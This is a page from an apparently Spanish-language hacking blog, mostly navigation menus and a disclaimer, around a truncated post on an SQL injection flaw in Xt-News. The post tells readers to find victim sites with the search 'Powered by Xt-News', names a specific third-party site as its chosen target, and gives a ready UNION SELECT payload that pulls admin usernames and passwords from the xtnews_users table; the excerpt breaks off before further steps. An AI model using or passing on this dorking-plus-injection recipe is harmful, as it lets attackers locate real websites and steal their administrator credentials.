• General

  • Comandos Hacking (7)
  • Definiciones (10)
  • Historia Hacking (3)
    • Bibliografías (2)
  • Humor Hacking (2)
  • Noticias (9)
  • Protocolo TCP/IP (red) (5)
  • Utilidades Hack (10)
  • Videos (3)
  • Vulnerabilidades (8)

  Comenzando

  • Introducción al Hacking (6)
  • Buscando una víctima (3)
  • Hacking Google (3)
  • Escaneo de máquinas y redes (2)
  • Trabajo en Windows (7)
  • Trabajando en Linux (4)

  Asaltando Sistemas

  • Asaltando Linux/Unix (1)
  • Asaltando Windows (2)
  • Hacking en Wireless (3)
  • Hacking por correo (1)
  • Hacking Web (7)
  • Troyanos (3)
  • Virus (2)

  Protegiendo la Red y el Software

  • Antivirus/Antispyware (1)
  • Auditoría del sistema (1)
  • Encriptación (1)
  • Firewalls y detección de intrusos (3)
  • VPN (1)

  Últimas Entradas

  • -Phising y Pharming
  • -Como Hackear una red wifi.
  • -Como guardar un sitio web con teleport by rush.
  • -Hacker se manifiesta en la web de la camara diputados de mexico.
  • -Que es el phishing?
  • -Funcionamiento y prevencion de VIRUS!
  • -FIREWALL [Explicativos, Definiciones, Como funcionan]
  • -Abierto el registro en el Blog

• Archivo Mensual

  • Marzo 2008 (1)
  • Febrero 2008 (13)
  • Agosto 2007 (1)
  • Julio 2007 (3)
  • Junio 2007 (3)
  • Mayo 2007 (3)
  • Abril 2007 (4)
  • Marzo 2007 (8)
  • Febrero 2007 (19)

  Archivo Diario

  • Marzo 8, 2008
  • Febrero 25, 2008
  • Febrero 24, 2008
  • Febrero 15, 2008
  • Febrero 14, 2008
  • Febrero 9, 2008
  • Febrero 7, 2008
  • Febrero 6, 2008
  • Febrero 5, 2008
  • Agosto 30, 2007
  • Julio 23, 2007
  • Julio 3, 2007
  • Julio 2, 2007
  • Junio 21, 2007
  • Junio 18, 2007

• Otras Webs

  • ElHacker.com
  • ForoHack.com
  • InformacionHispana.com
  • MessBlog.com
  • MundoGoogle.com
  • PortalGrafico.com
  • PortalMesLive.com
  • PrimeraVida.com
  • Sonimu.com
  • SoporteFisico.com
  • TuJuega.com

Bueno esta vulneravilidad consiste en una injecction SQL.
Para empezar si quieres buscar vulneravilidades Xt-News Tienes que tipear esto en google.
“Powered by Xt-News”
Resultado de la busqueda en google: http://www.google.com.mx/search?client=firefox-a&rls=org.mozilla%3A%3Aofficial&channel=s&hl=es&q=Powered+by+Xt-News&meta=&btnG=Buscar+con+Google
Aora escogemos alguna web la que sea.
En mi caso escogi esta: http://polyrando.org/xtnews/print.php?id_news=206
Aora lo que bamos a haces es coger nuestra SQL injecction que es la siguiente:
show_news.php?id_news=-1%20UNION%20SELECT%20%20id,user,null,null,mdp,null,null,null,null,null,null%20FROM%20xtnews_users%20WHERE%20%20admin=1
Aora pegamos eso […]

• Importante!

  Los autores de este blog pretenden informar sobre seguridad, vulnerabilidades, técnicas hack, hablar sobre lo último en hacking...
  
  Las herramientas, trucos, comandos, artículos... explicados en este blog NUNCA deberán ser usados de forma maligna para delinquir o dañar a terceros. No nos hacemos responsables de la mala interpretación ni del mal uso de cualquier contenido del blog.
  
  Todo lo que se habla en este blog está en internet (o proviene de alguno de los autores) y se puede consultar de forma libre. Si obtienes información de este blog para tu espacio, página web, blog... no olvides ponernos como fuente :).

• Acerca de

  

  El Blog del Hacker es una web llevada por usuarios de ForoHack.com perteneciente a la web ElHacker.com
  
  Si quieres colaborar con nosotros lo puedes hacer de forma abierta en nuestros foros y siendo un usuario frecuente podrás ser Autor de este blog.
  
  El objetivo principal de este blog es dar a conocer desde nuestro propio punto de vista el hacking en la red para Windows o Linux, conocer como funcionan las cosas, hacer más segura la red encontrando vulnerabilidades,... nunca para hacer el mal, estafar, ni nada parecido. Siempre de buen rollo =) Cuanto más se hable de forma abierta sobre estos temas más usuarios y empresas los conocerán y menos nos afectarán (será más segura la red)

  Últimos Comentarios

  • Como Hacer una envenenacion ARP en una Red
    04/08/2008 08:55 pm
    15 Comentarios
  • Phising y Pharming
    04/08/2008 03:47 pm
    14 Comentarios
  • Hablemos de Wifislax
    04/08/2008 03:22 pm
    96 Comentarios
  • MaS…Comandos MS DOS.
    04/08/2008 01:35 pm
    15 Comentarios
  • Que es un ataque RFI(Remote File Inclusion)
    04/08/2008 01:25 pm
    195 Comentarios
  • Injection HTML
    04/08/2008 01:19 pm
    32 Comentarios
  • Glosario sobre terminos
    04/04/2008 09:16 pm
    43 Comentarios
  • ¿Por donde empezar en el Hacking?
    04/04/2008 05:06 pm
    20 Comentarios

  Entradas más populares

• Feeds e Información

• Registrarse